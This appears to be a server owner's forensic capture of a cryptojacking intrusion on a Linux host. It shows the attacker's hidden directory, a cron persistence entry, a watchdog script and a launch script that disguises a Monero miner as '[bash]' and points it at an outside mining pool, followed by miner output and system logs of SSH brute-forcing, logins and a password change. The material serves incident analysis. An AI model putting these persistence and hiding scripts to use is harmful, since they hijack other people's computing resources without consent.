modified: n.fq
[GalaxyCodeBases.git] / etc / Server / hiding / theHacker.txt
blob2e920719782d79c1927df16ee667ca3d184b363d
1 [test@eutheria .test]$ ll ~/.cache/abrt/.test\r
2 total 8440\r
3 -rwxrwxr-x 1 test test 3880328 Aug 29 19:25 a.out\r
4 -rwxr-xr-x 1 test test     286 Jun  7 22:52 autorun\r
5 -rwxr-xr-x 1 test test 3876568 Apr  5 05:42 bash\r
6 -rwxrwxr-x 1 test test       5 Aug 24 02:19 bash.pid\r
7 -rwxrwxr-x 1 test test      59 Aug 24 02:19 cron\r
8 -rwxrwxr-x 1 test test      29 Aug 24 02:19 dir\r
9 -rwxr-xr-x 1 test test   15125 Feb 21  2016 h32\r
10 -rwxr-xr-x 1 test test  838583 Feb 21  2016 h64\r
11 -rwxr-xr-x 1 test test     425 Aug 24 01:46 run\r
12 -rwxrwxr-x 1 test test     188 Aug 24 02:19 upd\r
14 [test@eutheria .test]$ cat cron\r
15 * * * * * /home/test/.cache/abrt/.test/upd >/dev/null 2>&1\r
16 [test@eutheria .test]$ cat upd\r
17 #!/bin/sh\r
18 if test -r /home/test/.cache/abrt/.test/bash.pid; then\r
19 pid=$(cat /home/test/.cache/abrt/.test/bash.pid)\r
20 if $(kill -CHLD $pid >/dev/null 2>&1)\r
21 then\r
22 exit 0\r
23 fi\r
24 fi\r
25 ./run &>/dev/null\r
26 [test@eutheria .test]$ car run\r
27 bash: car: command not found...\r
28 Similar command is: 'sar'\r
29 [test@eutheria .test]$ cat run\r
30 #!/bin/bash\r
32 proc=`nproc`\r
33 ARCH=`uname -m`\r
34 HIDE="[bash]"\r
36 if [ "$ARCH" == "i686" ];       then\r
37         ./h32 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://dunhill9999%40hotmail.com:x@xmr.pool.minergate.com:45560/xmr >>/dev/null &\r
38 elif [ "$ARCH" == "x86_64" ];   then\r
39         ./h64 -s $HIDE ./bash -c 1 -t $proc -M stratum+tcp://dunhill9999%40hotmail.com:x@xmr.pool.minergate.com:45560/xmr >>/dev/null &\r
40 fi\r
41 echo $! > bash.pid\r
43 [test@eutheria .test]$ ./bash -c 1 -t 2 -M stratum+tcp://dunhill9999%40hotmail.com:x@xmr.pool.minergate.com:45560/xmr\r
44 YAM - Yet Another Miner by yvg1900\r
45 yam M7v-linux64-generic/yvg1900\r
46 **********************************************************************************************************\r
47 * Supported coins: PTS MMC MAX GRS DMD DVK MYR BCN QCN FCN XMR                                           *\r
48 * Author: yvg1900 (Twitter @yvg1900)                                                                     *\r
49 * XPT protocol: jh (http://ypool.net)                                                                    *\r
50 *                                                                                                        *\r
51 * Addresses for Thanks and Donations:                                                                    *\r
52 *   PTS: PZxsEQoiMeB6tHcW2ZySBEiCPio1WkxbEL                                                              *\r
53 *   XPM: AW2388DEWNEfMH4rP9kcj9yKcMq1QywYT4                                                              *\r
54 *   DTC: D6PmUogMigWvXurgFTqm5VLxQeVpXdYQj3                                                              *\r
55 *   MMC: MVk7PuJCa9o6qTYeiQRJDd3uHxKXMrQuU6                                                              *\r
56 *   LTC: Lby4YjhcAxhmbsdHFb4nYydrwGoiJezZt1                                                              *\r
57 *   BTC: 1FxekeK5La7AuF3oxiLzPKnjXyLMrux6VT                                                              *\r
58 *   NMC: N9KXqmzEqP7gB2dGHpEZiRMgFjUHNM38FR                                                              *\r
59 *   MAX: mTEsqg9dp3U9YXwduKxhhhDx1TRPBcNRvA                                                              *\r
60 *   NRS: 9qwyC34MCZ9XGopaNDNTnaMBtjAZhHvBd3                                                              *\r
61 *   GRS: FpHaQNJ2nMUc2kgBbzYue13E9VUfL8YbQp                                                              *\r
62 *   DMD: dEQZa7W7AczvUsjJkvWWrim1j8ZtgbAwXv                                                              *\r
63 *   DVK: D9o66V4h75JzWNpsaPidmKFVgwEf2DcDAX                                                              *\r
64 *   MYR: MFDpLPThL6D6vtWW42XobFNBpPdrJFPQb6                                                              *\r
65 *   XMR: 45w9aqVA6iVeMJ6jVHZPEyPqgVnBEAGhBBqGAW9ncXp44qbZy9vXkd2KpqYwcyVTQHF1kaSJm97GyceP3Y2dRMd7E9gyuZf *\r
66 *   BCN: 2AcGMZmmNWTiLvAg5n7ywMCAxXTxysYGsi1xzba2ok4UPccWTLqRyKN7EnQYUpEWpqBw1c9EVZrqo2CUG8f8mbjG5NA9njF *\r
67 *   QCN: 1V6wZP6aycYPbeafHxPcvaQfGs4M5kabHDQoTEsyCTT3HjccMyQbvEVNPoJuRc79XrPRYWESiAezyipWojpZ8bii3kczNgW *\r
68 *   FCN: 6rNjXkY5YQzWiTMmDUbL5gYTWx9UTdUMSA98S1G3cTmhZN9Xp6kq4woGeoK5Q8B3fPZV6TFKs36zdHpZnYxA4BFK3fLpJzW *\r
69 **********************************************************************************************************\r
70 Can not load config file [1]\r
71 Miner version: yam M7v-linux64-generic/yvg1900\r
72 Checking target [stratum+tcp://dunhill9999%40hotmail.com:x@xmr.pool.minergate.com:45560/xmr]...\r
73 Target OK\r
74 Checking XMR optimizations compatibility...\r
75 OK: XMR optimizations are compatible\r
76 Monero: Determine Algorithm Variation by finetuning\r
77 Using 2 CPU mining threads\r
78   Will mine 12 rounds for miner developers to support development of the next version\r
79   Follow @yvg1900 on Twitter to get information on new version availability on time\r
80 STRATUM-RPC2: Logged in with dunhill9999@hotmail.com\r
81 New Monero Block nTime 1504009614\r
82 Monero Aggregated Hash/sec: ?; Rounds Complete/Incomplete: 0/0, Donated Complete/Incomplete: 0/0; Config/Worker Hash/sec: ?/? on 0 rounds with AV=1, ART=? ms; Fine-tuning: IN PROGRESS, AV/RT: 1/0, Best AV/RT: 1/0\r
83   xmr.pool.minergate.com: On-line, Shares Submitted 0, Accepted 0\r
84 Share found!\r
85 Share found!\r
86 ^CLeaving miner...\r
90 [root@eutheria ~]# journalctl --since `date +"%Y-%m-%d" --date "last week"`\r
92 Aug 23 17:31:48 eutheria sshd[25262]: Invalid user nu from 128.199.69.55\r
93 Aug 23 17:31:48 eutheria sshd[25262]: input_userauth_request: invalid user nu [preauth]\r
94 Aug 23 17:31:48 eutheria sshd[25262]: pam_unix(sshd:auth): check pass; user unknown\r
95 Aug 23 17:31:48 eutheria sshd[25262]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=128.199.69.55\r
96 Aug 23 17:31:50 eutheria sshd[25262]: Failed password for invalid user nu from 128.199.69.55 port 52647 ssh2\r
97 Aug 23 17:31:50 eutheria sshd[25262]: pam_unix(sshd:auth): check pass; user unknown\r
98 Aug 23 17:31:52 eutheria sshd[25262]: Failed password for invalid user nu from 128.199.69.55 port 52647 ssh2\r
99 Aug 23 17:31:53 eutheria sshd[25262]: pam_unix(sshd:auth): check pass; user unknown\r
100 Aug 23 17:31:55 eutheria sshd[25262]: Failed password for invalid user nu from 128.199.69.55 port 52647 ssh2\r
101 Aug 23 17:31:56 eutheria sshd[25262]: Connection closed by 128.199.69.55 [preauth]\r
102 Aug 23 17:31:56 eutheria sshd[25262]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=128.199.69.55\r
103 Aug 23 17:36:13 eutheria sshd[25328]: Accepted password for test from 128.199.69.55 port 48311 ssh2\r
104 Aug 23 17:36:13 eutheria systemd[1]: Created slice user-1008.slice.\r
105 Aug 23 17:36:13 eutheria systemd[1]: Starting user-1008.slice.\r
106 Aug 23 17:36:13 eutheria systemd-logind[1332]: New session 6698 of user test.\r
107 Aug 23 17:36:13 eutheria systemd[1]: Started Session 6698 of user test.\r
108 Aug 23 17:36:13 eutheria systemd[1]: Starting Session 6698 of user test.\r
109 Aug 23 17:36:13 eutheria sshd[25328]: pam_unix(sshd:session): session opened for user test by (uid=0)\r
110 Aug 23 17:36:19 eutheria sshd[25328]: pam_unix(sshd:session): session closed for user test\r
111 Aug 23 17:36:19 eutheria systemd-logind[1332]: Removed session 6698.\r
112 Aug 23 17:36:19 eutheria systemd[1]: Removed slice user-1008.slice.\r
113 Aug 23 17:36:19 eutheria systemd[1]: Stopping user-1008.slice.\r
116 Aug 23 22:46:49 eutheria sshd[39106]: reverse mapping checking getaddrinfo for 45.76.93.115.vultr.com [45.76.93.115] failed - POSSIBLE BREAK-IN ATTEMPT!\r
117 Aug 23 22:46:51 eutheria sshd[39106]: Accepted password for test from 45.76.93.115 port 57997 ssh2\r
118 Aug 23 22:46:51 eutheria systemd[1]: Created slice user-1008.slice.\r
119 Aug 23 22:46:51 eutheria systemd[1]: Starting user-1008.slice.\r
120 Aug 23 22:46:51 eutheria systemd-logind[1332]: New session 6837 of user test.\r
121 Aug 23 22:46:51 eutheria systemd[1]: Started Session 6837 of user test.\r
122 Aug 23 22:46:51 eutheria systemd[1]: Starting Session 6837 of user test.\r
123 Aug 23 22:46:51 eutheria sshd[39106]: pam_unix(sshd:session): session opened for user test by (uid=0)\r
124 Aug 23 22:46:52 eutheria dbus[1335]: [system] Activating service name='org.freedesktop.problems' (using servicehelper)\r
125 Aug 23 22:46:52 eutheria dbus-daemon[1335]: dbus[1335]: [system] Activating service name='org.freedesktop.problems' (using servicehelper)\r
126 Aug 23 22:46:52 eutheria dbus[1335]: [system] Successfully activated service 'org.freedesktop.problems'\r
127 Aug 23 22:46:52 eutheria dbus-daemon[1335]: dbus[1335]: [system] Successfully activated service 'org.freedesktop.problems'\r
128 Aug 23 22:47:18 eutheria sshd[39106]: pam_unix(sshd:session): session closed for user test\r
129 Aug 23 22:47:18 eutheria systemd-logind[1332]: Removed session 6837.\r
130 Aug 23 22:47:18 eutheria systemd[1]: Removed slice user-1008.slice.\r
131 Aug 23 22:47:18 eutheria systemd[1]: Stopping user-1008.slice.\r
134 Aug 24 02:17:52 eutheria sshd[918]: reverse mapping checking getaddrinfo for 45.76.93.115.vultr.com [45.76.93.115] failed - POSSIBLE BREAK-IN ATTEMPT!\r
135 Aug 24 02:17:54 eutheria sshd[918]: Accepted password for test from 45.76.93.115 port 58936 ssh2\r
136 Aug 24 02:17:54 eutheria systemd[1]: Created slice user-1008.slice.\r
137 Aug 24 02:17:54 eutheria systemd[1]: Starting user-1008.slice.\r
138 Aug 24 02:17:54 eutheria systemd-logind[1332]: New session 6940 of user test.\r
139 Aug 24 02:17:54 eutheria systemd[1]: Started Session 6940 of user test.\r
140 Aug 24 02:17:54 eutheria systemd[1]: Starting Session 6940 of user test.\r
141 Aug 24 02:17:54 eutheria sshd[918]: pam_unix(sshd:session): session opened for user test by (uid=0)\r
142 Aug 24 02:17:55 eutheria dbus[1335]: [system] Activating service name='org.freedesktop.problems' (using servicehelper)\r
143 Aug 24 02:17:55 eutheria dbus-daemon[1335]: dbus[1335]: [system] Activating service name='org.freedesktop.problems' (using servicehelper)\r
144 Aug 24 02:17:55 eutheria dbus[1335]: [system] Successfully activated service 'org.freedesktop.problems'\r
145 Aug 24 02:17:55 eutheria dbus-daemon[1335]: dbus[1335]: [system] Successfully activated service 'org.freedesktop.problems'\r
146 Aug 24 02:17:55 eutheria run-parts(/etc/cron.hourly)[990]: finished 0yum-hourly.cron\r
147 Aug 24 02:17:55 eutheria systemd[1]: Removed slice user-0.slice.\r
148 Aug 24 02:17:55 eutheria systemd[1]: Stopping user-0.slice.\r
149 Aug 24 02:18:11 eutheria passwd[994]: pam_unix(passwd:chauthtok): password changed for test\r
150 Aug 24 02:18:12 eutheria gnome-keyring-daemon[997]: couldn't connect to dbus session bus: Unable to autolaunch a dbus-daemon without a $DISPLAY for X11\r
151 Aug 24 02:18:12 eutheria gnome-keyring-daemon[997]: couldn't connect to dbus session bus: Unable to autolaunch a dbus-daemon without a $DISPLAY for X11\r
152 Aug 24 02:18:12 eutheria passwd[994]: gkr-pam: changed password for login keyring\r
153 Aug 24 02:18:12 eutheria passwd[994]: gkr-pam: stopped the daemon\r
154 Aug 24 02:19:11 eutheria crontab[1088]: (test) REPLACE (test)\r
155 Aug 24 02:19:11 eutheria crontab[1089]: (test) LIST (test)\r
156 Aug 24 02:20:01 eutheria systemd[1]: Started Session 6942 of user test.\r
157 Aug 24 02:20:01 eutheria systemd[1]: Starting Session 6942 of user test.\r
158 Aug 24 02:20:01 eutheria CROND[1109]: (test) CMD (/home/test/.cache/abrt/.test/upd >/dev/null 2>&1)\r
159 Aug 24 02:20:01 eutheria systemd[1]: Removed slice user-0.slice.\r
160 Aug 24 02:20:01 eutheria systemd[1]: Stopping user-0.slice.\r
161 Aug 24 02:20:19 eutheria sshd[918]: pam_unix(sshd:session): session closed for user test\r
162 Aug 24 02:21:01 eutheria systemd[1]: Started Session 6944 of user test.\r
163 Aug 24 02:21:01 eutheria systemd[1]: Starting Session 6944 of user test.\r
164 Aug 24 02:21:01 eutheria CROND[1146]: (test) CMD (/home/test/.cache/abrt/.test/upd >/dev/null 2>&1)\r
165 Aug 24 02:22:01 eutheria systemd[1]: Started Session 6945 of user test.\r
166 Aug 24 02:22:01 eutheria systemd[1]: Starting Session 6945 of user test.\r
167 Aug 24 02:22:01 eutheria CROND[1166]: (test) CMD (/home/test/.cache/abrt/.test/upd >/dev/null 2>&1)\r
168 Aug 24 02:23:01 eutheria systemd[1]: Started Session 6946 of user test.\r
169 Aug 24 02:23:01 eutheria systemd[1]: Starting Session 6946 of user test.\r
170 Aug 24 02:23:01 eutheria CROND[1181]: (test) CMD (/home/test/.cache/abrt/.test/upd >/dev/null 2>&1)\r
171 Aug 24 02:24:01 eutheria systemd[1]: Started Session 6947 of user test.\r
172 Aug 24 02:24:01 eutheria systemd[1]: Starting Session 6947 of user test.\r
173 Aug 24 02:24:01 eutheria CROND[1200]: (test) CMD (/home/test/.cache/abrt/.test/upd >/dev/null 2>&1)\r
174 Aug 24 02:25:01 eutheria systemd[1]: Started Session 6949 of user test.\r
175 Aug 24 02:25:01 eutheria systemd[1]: Starting Session 6949 of user test.